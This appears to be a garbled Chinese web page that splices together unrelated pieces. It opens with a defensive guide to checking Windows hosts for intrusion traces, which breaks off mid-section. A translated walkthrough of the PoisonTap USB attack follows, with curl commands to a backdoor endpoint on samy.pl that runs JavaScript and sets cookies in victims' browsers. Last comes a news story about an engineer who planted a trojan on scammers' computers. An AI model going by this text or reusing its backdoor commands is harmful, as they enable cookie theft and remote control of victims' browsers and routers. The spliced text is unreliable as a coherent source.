在攻防演練保障期間,一線工程師在實施主機入侵痕跡排查服務(wù)時可能面臨時間緊、任務(wù)急、需要排查的主機數(shù)量眾多情況。為了確保實施人員在有限的時間范圍內(nèi),可以高效且保證質(zhì)量的前提下完成主機入侵痕跡排查工作,本人總結(jié)了自己的一些經(jīng)驗,下面的內(nèi)容特此分享主機入侵痕跡排查服務(wù)中重點、關(guān)鍵的排查項,僅作為參考使用。
一般情況下,客戶資產(chǎn)都比較多,想要對所有的資產(chǎn)主機進行入侵痕跡排查基本不太現(xiàn)實,等你全部都排查完了,攻擊者該做的事早就做完了,想要的目的也早就達(dá)到了。那么針對客戶資產(chǎn)量大的情況,我們應(yīng)該怎么處理?
首先,在排查前,作為項目經(jīng)理,應(yīng)該與客戶溝通好,取得授權(quán),確認(rèn)排查范圍和排查方案和辦法,客戶若是沒有授意或者同意,那么下面的操作都是違規(guī)操作,甚至有的還違法。
取得客戶同意后,我們再從資產(chǎn)面臨的風(fēng)險等級、資產(chǎn)的重要程度、攻擊者的攻擊思路、手法及目標(biāo)選擇傾向幾個方面去初步篩選出排查資產(chǎn)。這里建議從以下資產(chǎn)范圍選取:
①曾失陷資產(chǎn):在以前的紅藍(lán)對抗、攻防演練、或者真實的黑客攻擊事件中被攻陷的主機,曾失陷資產(chǎn)應(yīng)作為排查的重點對象。
②互聯(lián)網(wǎng)暴露脆弱資產(chǎn):從互聯(lián)網(wǎng)暴露資產(chǎn)中篩選出使用了高危漏洞頻發(fā)的組件/應(yīng)用(組件如Weblogic、JBoss、Fastjson、Shiro、Struts2等)。還有一個點需要注意,就是客戶是否具有有效的資產(chǎn)管理,是否能夠清晰明確識別出哪些資產(chǎn)用了什么組件,如果不能的話,只能通過之前的滲透測試結(jié)果來篩選出脆弱資產(chǎn)。
③關(guān)鍵資產(chǎn):如域控等可以導(dǎo)致大量主機失陷的集權(quán)類資產(chǎn)。
主機入侵痕跡排查工作建議在一周內(nèi)對數(shù)量控制在20臺以內(nèi)的主機進行排查。經(jīng)過初步篩選的資產(chǎn)數(shù)量如果遠(yuǎn)遠(yuǎn)大于20臺主機,需要從資產(chǎn)里面進行二次篩選,如果存在曾失陷資產(chǎn),排查主機范圍可以定為曾失陷資產(chǎn);如果不存在曾失陷資產(chǎn),排查主機范圍可以定為脆弱資產(chǎn),具體可以根據(jù)客戶自身實際情況調(diào)整。
需要注意是,如果排查資產(chǎn)中包含曾失陷資產(chǎn)的話,需要向客戶索要歷史攻防演練/應(yīng)急等報告,在排查時需結(jié)合歷史報告和指導(dǎo)手冊內(nèi)容一起進行排查,需要特別留意歷史報告中攻擊者的入侵痕跡是否已經(jīng)完全清理。
在實際情況下,攻擊者在進行攻擊時使用的攻擊手法、攻擊思路、行為等各有差異,無論是考慮實現(xiàn)成本還是效率問題,都難以通過很精細(xì)很全面的排查項去實施主機入侵痕跡排查,但是我們可以從攻擊中可能會產(chǎn)生的一些比較共性的行為特征、關(guān)鍵的項進行排查。
對于主機的入侵痕跡排查,主要從網(wǎng)絡(luò)連接、進程信息、后門賬號、計劃任務(wù)、登錄日志、自啟動項、文件等方面進行排查。比如,如果存在存活后門,主機可能會向C2發(fā)起網(wǎng)絡(luò)連接,因此可以從網(wǎng)絡(luò)連接排查入手,如果存在異常的網(wǎng)絡(luò)連接,則必然說明存在惡意的進程正在運行,則可以通過網(wǎng)絡(luò)連接定位到對應(yīng)進程,再根據(jù)進程定位到惡意文件。如果攻擊者企圖維持主機控制權(quán)限的話,則可能會通過添加后門賬號、修改自啟動項,或者添加計劃任務(wù)等方式來維持權(quán)限,對應(yīng)的我們可以通過排查賬號、自啟動項、計劃任務(wù)來發(fā)現(xiàn)相應(yīng)的入侵痕跡。
攻擊者一般使用 attrib <程序> +s +h 命令隱藏惡意程序,故在排查痕跡前需打開“工具--文件夾選項--查看”。按照下圖中的設(shè)置,即可顯示所有文件。
2.1.1網(wǎng)絡(luò)連接
排查步驟:
在CMD中執(zhí)行 netstat -ano 查看目前的網(wǎng)絡(luò)連接。
這種情況一般都比較正常,只有80和443端口,一般都是正常業(yè)務(wù)開放端口。
分析方法:
如果網(wǎng)絡(luò)連接出現(xiàn)以下情況,則當(dāng)前主機可能已經(jīng)失陷:
1、主機存在對內(nèi)網(wǎng)網(wǎng)段大量主機的某些端口(常見如22,445,3389,6379等端口)或者全端口發(fā)起網(wǎng)絡(luò)連接嘗試,這種情況一般是當(dāng)前主機被攻擊者當(dāng)作跳板機對內(nèi)網(wǎng)實施端口掃描或者口令暴力破解等攻擊。
2、主機和外網(wǎng)IP已經(jīng)建立連接(ESTABLISHED狀態(tài))或者嘗試建立連接(SYN_SENT狀態(tài)),可以先查詢IP所屬地,如果IP為國外IP或者歸屬各種云廠商,則需要重點關(guān)注。進一步可以通過威脅情報(https://x.threatbook.cn/等)查詢IP是否已經(jīng)被標(biāo)注為惡意IP。
3、如果無法直接從網(wǎng)絡(luò)連接情況判斷是否為異常連接,可以根據(jù)網(wǎng)絡(luò)連接找到對應(yīng)的進程ID,判斷進程是否異常。如果不能從進程判斷,可以進一步找到進程對應(yīng)文件,將對應(yīng)文件上傳至virustotal(https://www.virustotal.com)進行檢測。如上面截圖中對內(nèi)網(wǎng)掃描的進程ID是2144,在任務(wù)管理器中發(fā)現(xiàn)對應(yīng)的文件是svchost.exe。
上傳至virustotal檢測的結(jié)果為惡意文件。
若在排查網(wǎng)絡(luò)連接中,任務(wù)管理器只能看到有命令行工具(如powershell、cmd)powershell進程與外聯(lián)IP建立會話,無法看到進程對應(yīng)的運行參數(shù)。此時可借助Process Explorer進一步觀察powershell的運行參數(shù)。如下在Process Explorer中發(fā)現(xiàn)powershell執(zhí)行了cobalt strike腳本的痕跡。
2.1.2敏感目錄
排查步驟:
查看攻擊方常喜歡上傳的目錄是否有可疑文件。
分析方法:
1、各個盤符下的臨時目錄,如C:\TEMP、C:\Windows\Temp等。
2、%APPDATA%,在文件夾窗口地址欄輸入%APPDATA%,回車即可打開當(dāng)前用戶的appdata目錄。
如Administrator用戶對應(yīng)的%APPDATA%目錄C:\Users\Administrator\AppData\Roaming。可以按照修改日期排序篩選出比較臨近時間有變更的文件。
3、瀏覽器的下載目錄
4、用戶最近文件%UserProfile%\Recent,如Administrator對應(yīng)的目錄為C:\Users\Administrator\Recent
5、回收站,如C盤下回收站C:$Recycle.Bin
對于腳本文件可直接查看內(nèi)容判定是否為惡意,若是遇到exe可執(zhí)行文件,可將對應(yīng)文件上傳至virustotal(https://www.virustotal.com)進行檢測。
2.1.3后門文件
排查步驟:
查看粘滯鍵exe;
查看注冊表中映像的鍵值。
分析方法:
1、查看粘滯鍵exe
查看C:\Windows\System32\下的sethc.exe文件的創(chuàng)建、修改時間是否正常,如下圖,一般情況下,系統(tǒng)文件的創(chuàng)建時間與修改時間應(yīng)相同,sethc的創(chuàng)建時間與修改時間不同,可確定sethc已被替換成后門文件。由于攻擊者可修改文件時間,上述簡單粗暴的判斷方式可能不靠譜,可將sethc拷貝出來、上傳至VT檢測危害。
2、查看注冊表中映像的鍵值
檢查注冊表“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options”下所有exe項中是否有debugger鍵,若有debugger鍵,將其鍵值對應(yīng)的程序上傳至VT檢測。如下圖,攻擊者利用該映像劫持的攻擊者方式,在sethc.exe項中新建debugger鍵值指向artifact.exe,攻擊效果為當(dāng)連續(xù)按5下shift鍵后,不會執(zhí)行sethc.exe,而是轉(zhuǎn)而執(zhí)行劫持后的artifact.exe文件。于是在排查中發(fā)現(xiàn)有debugger鍵值,均可認(rèn)為指定的文件為后門文件,待上傳VT后確認(rèn)其危害。
這里沒有debugger鍵,下面的圖是有的:
2.1.4后門賬號
排查步驟:
打開regedit查看注冊表中的賬號;
查看administrators組中是否存在賦權(quán)異常的賬號。
分析方法:
查看注冊表中HKLM\SAM\SAM\Domains\Account\Users\Names中是否有多余的賬號(可詢問客戶運維人員以確定賬號存在的必要性)。正常情況下,上述路徑的SAM權(quán)限僅system用戶可查看,需要給administrator用戶授權(quán)才能打開完整路徑。對SAM右鍵、給administator用戶添加完全控制權(quán)限(下圖的權(quán)限操作方法適用于win7及以上操作系統(tǒng)):
win2003、XP等低版本系統(tǒng)的操作方法請使用下圖的流程給administrators組添加權(quán)限。
帶有$符號的賬號特指隱藏賬號(如aaaa$),正常業(yè)務(wù)中不需要創(chuàng)建隱藏賬號,可判斷帶有$符號的均為后門賬號。然后在客戶運維的協(xié)助下排查其他的異常賬號。
如下圖中,除了aaaa$可直接判斷外,root賬號為高度關(guān)注對象。(注:aaaa$中的鍵值0x3ea表示該賬號與Users表中相應(yīng)數(shù)值的表相對應(yīng),在刪除賬號時需一起刪除)
注:異常賬號刪除后需要將之前授權(quán)的administrator移除SAM權(quán)限。
查看administrators組中是否存在賦權(quán)異常的賬號。比如正常情況下guest用戶處于禁用狀態(tài)、普通應(yīng)用賬戶(weblogic、apache、mysql)不需要在administrators組中。如下圖,執(zhí)行命令net user guest查看guest賬號的信息,如果guest賬號被啟用,且在管理員組成員中有g(shù)uest用戶,需要詢問客戶運維人員該guest賬戶啟用的必要性以及加入管理組是否有必要,否則可認(rèn)為攻擊者將系統(tǒng)自帶用戶guest啟用并提權(quán)至管理員組后作為后門賬號使用。
執(zhí)行net localgroup Administrators關(guān)注管理員組別是否存在異常賬號:
2.1.5自啟動項
排查步驟:
使用Autoruns工具查看自啟動項
查看組策略中的腳本
查看注冊表中的腳本、程序等
查看各賬號自啟目錄下的腳本、程序等
查看Windows服務(wù)中的可執(zhí)行文件路徑
分析方法:
1、使用Autoruns:
使用工具能較全面地查看系統(tǒng)中的自啟動項。在得到客戶授權(quán),能夠在可能失陷的主機上傳排查工具時,可使用Autoruns工具進行詳細(xì)的自啟動項排查。排查中主要關(guān)注粉色條目,建議與客戶運維人員一同查看,以及時排除業(yè)務(wù)所需的正常自啟項。如下圖,在Everything欄中,查看粉色的條目中發(fā)現(xiàn)常見的sethc被劫持為cmd,Command Processor鍵值(默認(rèn)為空)關(guān)聯(lián)到名為windowsupdate.exe(效果為啟動cmd時,被關(guān)聯(lián)的程序會靜默運行)。sethc的劫持可確認(rèn)為入侵痕跡,Command Processor鍵值的關(guān)聯(lián)程序需要找客戶進一步確認(rèn)是否業(yè)務(wù)所需,或?qū)indowsupdate.exe上傳VT檢測。
另外,這個工具很好用 ,特別小,可以直接上傳文件到VT進行檢測。
2、查看組策略:
在無法使用工具、只能手工排查的情況下,可查看常見的自啟項手否有異常文件。打開gpedit.msc--計算機配置/用戶配置--Windows設(shè)置--腳本,在此處可設(shè)置服務(wù)器啟動/關(guān)機或者用戶登錄/注銷時執(zhí)行的腳本。下圖1、2兩處的腳本均需要查看是否添加有腳本。
我這里沒有腳本。
2.1.6日志
工程師基本都會看日志,windows日志也就那些內(nèi)容,比較簡單,我就不細(xì)述,主要寫一下幾個比較重要的點,基本上就可以排查出是否有異常登錄了。
排查步驟:
查看登錄日志中暴力破解痕跡;
查看賬號管理日志中賬號的新增、修改痕跡;
查看遠(yuǎn)程桌面登錄日志中的登錄痕跡。
poison Tap插入被鎖定/密碼保護的電腦時:
詳細(xì)的視頻介紹:
[embed]http://v.youku.com/v_show/id_XMTgyMjc3NDU2OA==.html[/embed]
poison Tap 繞過以下安全機制:
PoisonTap
PoisonTap是由 價值5$的Raspberry Pi Zero構(gòu)建的,除了微型USB電纜和microSD卡之外不需要任何其它額外組件,但PoisonTap可以在其它可以模擬USB小部件(如USB Armory和LAN Turtle)的設(shè)備上工作。
(incredible HTML5 canvas animation by Ara) Video Demo: https://youtu.be/Aatp5gCskvk Point of Contact: @SamyKamkar // https://samy.pl Released: November 16, 2016 Source code and download: https://github.com/samyk/poisontapHow PoisonTap Works
PoisonTap通過利用機器和網(wǎng)絡(luò)的各種機制(包括USB / Thunderbolt,DHCP,DNS和HTTP)中現(xiàn)有的信任來產(chǎn)生級聯(lián)效應(yīng),從而產(chǎn)生信息滲透,網(wǎng)絡(luò)訪問和半永久后門的安裝的雪球效應(yīng)。
簡而言之,PoisonTap執(zhí)行以下操作:
網(wǎng)絡(luò)攻擊
1.網(wǎng)絡(luò)劫持攻擊者將PoisonTap(例如武裝強化的Raspberry Pi Zero)插入鎖定的計算機(即使計算機受密碼保護) 2.PoisonTap模擬以太網(wǎng)設(shè)備(例如,USB / Thunderbolt) - 默認(rèn)情況下,Windows,OS X和Linux識別以太網(wǎng)設(shè)備,自動將其作為低優(yōu)先級網(wǎng)絡(luò)設(shè)備加載并在其上執(zhí)行DHCP請求,即使機器被鎖定或密碼保護 3.PoisonTap響應(yīng)DHCP請求并為機器提供IP地址,但是DHCP響應(yīng)的目的是告訴機器整個IPv4空間(0.0.0.0 - 255.255.255.255)是PoisonTap本地網(wǎng)絡(luò)的一部分,而不是子網(wǎng)(如192.168.0.0 - 192.168.0.255)
抓取Cookie
1.只要Web瀏覽器正在運行后臺,每打開一個頁面,服務(wù)器后臺都要進行http請求(例如加載新廣告,將數(shù)據(jù)發(fā)送到分析平臺,或者只是繼續(xù)跟蹤您的網(wǎng)絡(luò)運動)
2.根據(jù)此HTTP請求,由于所有流量都退出到PoisonTap設(shè)備,PoisonTap DNS欺騙即時返回其自己的地址,導(dǎo)致HTTP請求命中PoisonTap Web服務(wù)器(Node.js)
3.當(dāng)Node web服務(wù)器接收到請求時,PoisonTap會響應(yīng)一個可以解釋為HTML或Javascript的響應(yīng),這兩個都正確執(zhí)行(許多網(wǎng)站將在后臺請求中加載HTML或JS) 4.然后,HTML / JS-agnostic頁面會生成許多隱藏的iframe,每個iframe跨越不同的Alexa-top-100萬個域
基于web后門的遠(yuǎn)程訪問
1.雖然PoisonTap正在生產(chǎn)數(shù)千個iframe,迫使瀏覽器加載每個iframe,但這些iframe不僅僅是空白頁面,而是無限緩存的HTML + Javascript后門 2.即使用戶當(dāng)前未登錄,由于PoisonTap在每個域上強制緩存這些后門,后門被綁定到該域,使攻擊者能夠使用域的Cookie并在將來啟動同源請求,即使用戶當(dāng)前未登錄
3.頁面的實際響應(yīng)是HTML和Javascript的組合,其產(chǎn)生持續(xù)的WebSocket到攻擊者的web服務(wù)器(通過因特網(wǎng),而不是PoisonTap設(shè)備)
[caption id="attachment_92146" align="aligncenter" width="628"]
OLYMPUS DIGITAL CAMERA[/caption]
內(nèi)部路由器后門和遠(yuǎn)程訪問
1.PoisonTap不能劫持是真正的網(wǎng)絡(luò)接口的實際LAN子網(wǎng)(例如,如果用戶的wifi子網(wǎng)是192.168.0.x,這個網(wǎng)絡(luò)不受影響),但... 2.PoisonTap在一個特別主機上強制緩存后門,具體地,目標(biāo)路由器的IP后面加上“.ip.samy.pl”,例如。 192.168.0.1.ip.samy.pl,基本上產(chǎn)生持久的DNS重綁定攻擊
3.DNS綁定和DNS重綁的安全性由于耗盡DNS綁定表而被繞過。由于之前做出的成千上萬次的請求,DNS不需要重新綁定,使得該攻擊可以持續(xù)很長時間(感謝Matt Austin分享這種攻擊思路!) 4.現(xiàn)在,后門強制連接到http://192.168.0.1.ip.samy.pl/PoisonTap,任何對192.168.0.1.ip.samy.pl的請求都將命中非固定的IP地址,導(dǎo)致192.168.0.1 以解析,直接指向路由器 5.這意味著如果通過后門遠(yuǎn)程在iframe中加載192.168.0.1.ip.samy.pl/PoisonTap主機,你可以對內(nèi)部路由器上的任何其他頁面執(zhí)行AJAX GET / POST,完全遠(yuǎn)程,從而允許遠(yuǎn)程訪問內(nèi)部路由器
Recap of the DNS server:
[ip.addy].ip.samy.pl normally responds with [ip.addy] 192.168.0.1.ip.samy.pl -> 192.168.0.1 (A record) [ip.addy].pin.ip.samy.pl temporarily (~5 seconds) points *.ip.samy.pl to [ip.addy] 1.0.0.1.pin.ip.samy.pl -> 1.0.0.1 192.168.0.1.ip.samy.pl -> 1.0.0.1 (A record, short TTL) (after ~5 seconds) 192.168.0.1.ip.samy.pl -> 192.168.0.1 (A record)
基于web遠(yuǎn)程訪問的其它后門
1.此外,PoisonTap替代了成千上萬的常見的,基于CDN的Javascript文件,如谷歌和jQuery CDNs。在確定安全的代碼加上一個后門,可以讓攻擊者訪問任何域時加載受感染的基于CDN的Javascript文件 2.由于每個域上都留有后門,即使當(dāng)前受害者沒有對當(dāng)前域任何開放任何窗口,攻擊者幾乎可以遠(yuǎn)程強制后端瀏覽器在任何主域上執(zhí)行同源請求(AJAX GET / POST) 3.當(dāng)受害者訪問網(wǎng)站時,后門現(xiàn)在可以在任何額外的網(wǎng)站上使用這些受感染的,基于HTTP的CDN Javascript框架
安全預(yù)防posion Tap
服務(wù)端安全
如果你正在運行一個web服務(wù)器,以下是安全防御posion Tap的樣例: 1.僅使用HTTPS,至少為認(rèn)證和已認(rèn)證的內(nèi)容使用HTTPS 2.老實說,你應(yīng)該單獨使用HTTPS,并始終將HTTP內(nèi)容重定向到HTTPS,防止用戶通過HTTP提交被欺騙提供的憑據(jù)或其它PII 3.確保在Cookie上啟用安全標(biāo)記,防止通過HTTP泄漏HTTPS Cookie 4.使用HSTS防止HTTPS降級攻擊
桌面安全
1.拿粘合劑封住USB和Thunderbolt端口效果不錯(與第3條類似,不過這里是物理封鎖---小編注) 2.每次離開機器時關(guān)閉瀏覽器,不過這是完全不切實際的 3.禁用USB / Thunderbolt端口也是有效的,雖然也不切實際 4.鎖定計算機沒有任何效果,因為網(wǎng)絡(luò)和USB堆棧在機器鎖定期間操作。但是,計算機進入加密睡眠模式(例如,F(xiàn)ileVault2 +深度睡眠)可以解決大多數(shù)問題,因為內(nèi)存需要內(nèi)存需要秘鑰解密,即使你的瀏覽器被喚醒。它仍然不能提出任何請求。
Code下載地址:
Source code: https://github.com/samyk/poisontap文件分解
在poisontap中有許多文件,它們用于不同的方面。 以下是文件列表:
# pop alert to victim
curl 'http://samy.pl:1337/exec?alert("muahahahaha")'
# to set a cookie on victim
curl 'http://samy.pl:1337/exec?document.cookie="key=value"'
# to force victim to load a url via ajax (note, jQuery is stored inside the backdoor)
curl 'http://samy.pl:1337/exec?$.get("http://192.168.0.1.ip.samy.pl/login",function(d)\{console.log(d)\})'
安工程師遇電信詐騙用木馬“反制”
入侵騙子電腦調(diào)取資料移交警方 當(dāng)事人承認(rèn)此手段存在法律風(fēng)險 不建議輕易嘗試
1月12日,網(wǎng)絡(luò)安全工程師李治收到了一條冒充他前公司法人的電信詐騙短信,這一次他沒選擇無視,而是用木馬病毒入侵了騙子電腦,獲取了騙子的IP地址、面部特征等信息,然后移交給了警方。
成功反制電信詐騙者后,李治將自己與騙子“斗智斗勇”的經(jīng)過發(fā)到了微博上,然后迅速引起熱議,有人向他求助,有人給他點贊,也有人質(zhì)疑李治入侵他人電腦的合法性。李治對北京青年報記者表示,即便他的目的是打擊犯罪,但利用木馬病毒入侵他人電腦的行為也不值得提倡。
李治調(diào)用騙子的攝像頭拍下了對方的樣子
網(wǎng)安工程師遭遇電信詐騙
據(jù)李治介紹,他是在1月11日下午5時許收到的詐騙短信,這條短信偽裝成他之前供職企業(yè)的趙姓法人。短信中寫道:“我以前的號碼不用了!你備注存一下這個!以后都是聯(lián)系這個,收到回短信。”
“這種冒充領(lǐng)導(dǎo)的‘套路’在電信詐騙中很常見。”作為一名網(wǎng)絡(luò)安全工程師,李治對各種電信詐騙的套路都有所了解。以往收到詐騙短信他都是一笑而過,這次正好趕上自己比較閑,于是決定跟短信那頭的騙子“過過招”。
“我給自己編了個‘財務(wù)小劉’的身份,管財務(wù)的自然手上會過錢,對騙子是很大的誘惑。”李治告訴北青報記者,但最開始騙子并沒有輕舉妄動,而是以“我在外面有事情”為由中止了第一次談話。
李治認(rèn)為這是騙子的心理戰(zhàn)術(shù),為了讓“領(lǐng)導(dǎo)”忙碌的形象更加立體。而他也得讓“財務(wù)小劉”的形象顯得更真實,于是李治開始主動向騙子“匯報工作”。果然,第二天騙子又開始聯(lián)系了他,這次就直奔主題了。1月12日上午8時許,騙子向李治表示自己要給“政府領(lǐng)導(dǎo)”送5萬元的禮金,但是不便用自己的賬戶,需要借李治的賬戶進行中轉(zhuǎn)。
李治當(dāng)時編造了一個虛假的工商銀行賬戶,騙子迅速發(fā)了一張農(nóng)業(yè)銀行的網(wǎng)銀轉(zhuǎn)賬截圖,并自稱跨行轉(zhuǎn)賬“也許不能即時到賬”,所以需要李治先用自己的賬戶轉(zhuǎn)錢給“政府領(lǐng)導(dǎo)”。
用木馬鏈接入侵騙子電腦
隨后,李治以“手機銀行轉(zhuǎn)不過去”、“自己在外面沒法操作”等理由與騙子斡旋,騙子則一再催促。李治覺得,現(xiàn)在正是騙子能否騙到這筆錢的關(guān)鍵時刻,他決定做一次“主動出擊了”。
李治首先向騙子丟了一個“誘餌”,假稱他在外面不方便操作,愿意把自己網(wǎng)銀的證書和密碼都發(fā)給騙子。“本來頂多能從我這騙5萬,我給他證書和密碼意味著我卡里有多少,他就能取多少,我覺得他難以抗拒這種誘惑。”
在短信中,李治附上了一個“下載網(wǎng)銀證書”的網(wǎng)盤鏈接,而鏈接里所謂的“網(wǎng)銀證書”實際上是一個可以入侵對方電腦的木馬病毒。
很快,李治從自己的電腦看到裝載著木馬病毒的“網(wǎng)銀證書”被下載了兩次。“他應(yīng)該是自己下載了發(fā)現(xiàn)打不開,還發(fā)給了另一個同伙嘗試,下載成功那一刻他們的電腦就被我入侵了。”
隨后,李治迅速通過木馬控制了兩個騙子的電腦,并搜集了這兩人的各種信息,然后將材料整合后交給了騙子所在地的警方。“這里面有IP地址,有他們的相貌,還有一些涉及隱私的信息,警方告訴我目前還在調(diào)查中。”
律師:法律不支持“反制”行為
李治將自己與電信詐騙犯智斗的短信截圖發(fā)在了自己的微博上立刻引發(fā)了熱議。有人對李治的行為表示贊賞,有人私信他希望他能幫忙追回自己被騙的錢,也有人對李治的行為提出質(zhì)疑,主要集中于以木馬病毒入侵對方電腦是否合法。
對此,北京市京都律師事務(wù)所常莎律師對北青報記者表示,利用木馬病毒反制電信詐騙犯的行為并不屬于正當(dāng)防衛(wèi),而且涉嫌侵犯他人個人隱私。
常莎解釋,根據(jù)《刑法》第20條規(guī)定,正當(dāng)防衛(wèi)需要具備“不法侵害”和“正在進行”兩個要件,但是李治在已經(jīng)識別詐騙犯的詐騙行為之后,不可能再基于錯誤的認(rèn)識處分自己的財產(chǎn)從而“被詐騙”,所以雖然在表面上騙子仍在實施詐騙行為,但實際上已經(jīng)不存在緊急的被騙的可能性了,因而不成立正當(dāng)防衛(wèi)。
常莎表示,李治的反制行為還有可能涉及侵犯他人個人隱私。我國《民法總則》第111條規(guī)定“自然人的個人信息受法律保護。任何組織和個人需要獲取他人個人信息的,應(yīng)當(dāng)依法取得并確保信息安全,不得非法收集、使用、加工、傳輸他人個人信息,不得非法買賣、提供或者公開他人個人信息。”盡管程序員本身是為了獲取詐騙犯的犯罪證據(jù),但是其獲取證據(jù)的手段可能會侵犯他人的個人信息。通過木馬病毒侵入他人個人計算機信息系統(tǒng),對詐騙犯進行監(jiān)控監(jiān)聽等都屬于偵查手段,應(yīng)該由國家專門機關(guān)行使。
對話
“我這種行為不值得提倡”
北青報:你為什么會對騙子的“套路”和心理這么了解?
李治:我是一個網(wǎng)絡(luò)安全工程師,接觸研究過不少電信詐騙的案例,所以我很熟悉詐騙犯的套路和心理。冒充公司法人的、中獎的,冒充公檢法的,甚至哪種騙術(shù)主要集中在哪個區(qū)域我都有所了解。
北青報:你的木馬程序是哪兒來的?
李治:我的工作內(nèi)容本身就是幫助系統(tǒng)和網(wǎng)站抵御木馬病毒的入侵,所以有不少木馬病毒的樣本。這次反制騙子的木馬病毒就是之前研究過的一個樣本,稍微改動了一下。
北青報:這不是你第一次反制騙子嗎?
李治:不是,我第一次反制騙子是大學(xué)的時候,那時候和同學(xué)一起在網(wǎng)上買杯子,結(jié)果賣家收了錢以后關(guān)店跑了,當(dāng)時很生氣就攻擊了那個賣家的電腦,讓他的電腦一開機就藍(lán)屏。
這次反制騙子的木馬病毒其實去年11月也用過,也是成功入侵了對方的電腦和攝像頭,然后把材料交給了警方。不過,我不鼓勵大家都像我這么做,畢竟用木馬病毒入侵別人的電腦不是什么值得提倡的事。
“不知攻,焉知防”
北青報:你是如何進入網(wǎng)絡(luò)安全行業(yè)的?
李治:我從初中開始就比較喜歡寫程序,當(dāng)時也幫一些網(wǎng)站做做補丁和安全系統(tǒng),賺了不少零花錢。賺得最多的一次是幫一個網(wǎng)吧做了一套安全系統(tǒng),給了我3萬塊錢。但是都是網(wǎng)上做,所以網(wǎng)吧老板不知道我是個初中生。后來大學(xué)學(xué)了相關(guān)專業(yè),就進入了網(wǎng)絡(luò)安全行業(yè)。
北青報:你的工作會經(jīng)常和騙子、黑客打交道嗎?
李治:我們行業(yè)有句話叫“不知攻,焉知防”。所以我們也會跟一些黑客探討工作,比如他們怎么攻破防火墻,怎么入侵系統(tǒng),了解了他們的攻擊手法,我們才好做防御系統(tǒng)。“徐玉玉”案里那個黑客就和我切磋過業(yè)務(wù),那時候他還沒墮落到去干詐騙,在圈里也有點小名氣,我只知道他的網(wǎng)名,后來“徐玉玉”案里他被抓了,我才知道了他的真名。
“我并不提倡大家像我這么做”
北青報:你把反制騙子的經(jīng)過發(fā)微博之后都收到什么樣的反饋?
李治:有很多人找我。有些找我的人理由奇葩,有問我能不能幫她看前男友QQ空間的,有讓我?guī)兔Χㄎ蛔ァ靶∪钡模€有人發(fā)來一段代碼讓我看看哪兒寫錯了。也有人跟我說了他們被電信詐騙的經(jīng)歷,那些人少的幾百幾千,多的有自稱被騙了上百萬的,問我能不能幫忙找到詐騙者。
北青報:你能幫他們找到詐騙者嗎?
李治:很難。一方面詐騙者很狡猾,留的信息大多是假的,手機號和IP地址經(jīng)常變動,不好定位,就算找到人也很難追回錢。另一方面,我這種用木馬病毒入侵他人電腦的行為有法律風(fēng)險,我并不提倡大家像我這么做,我用的木馬病毒已經(jīng)銷毀了,如果大家真的遭遇了電信詐騙,還是應(yīng)該第一時間求助警方。
北青報:在預(yù)防電信詐騙方面你有什么建議嗎?
李治:其實電信詐騙基本玩的都是心理戰(zhàn),你收到陌生短信,不管內(nèi)容是什么,既不要慌,也不要輕信。先從其他渠道求證一下,比如查一下號碼歸屬地。碰上冒充老板的,通過其他渠道問一下老板本人,要是冒充公檢法的,先打當(dāng)?shù)氐墓矙C關(guān)電話問一下。
文/本報記者 李卓雅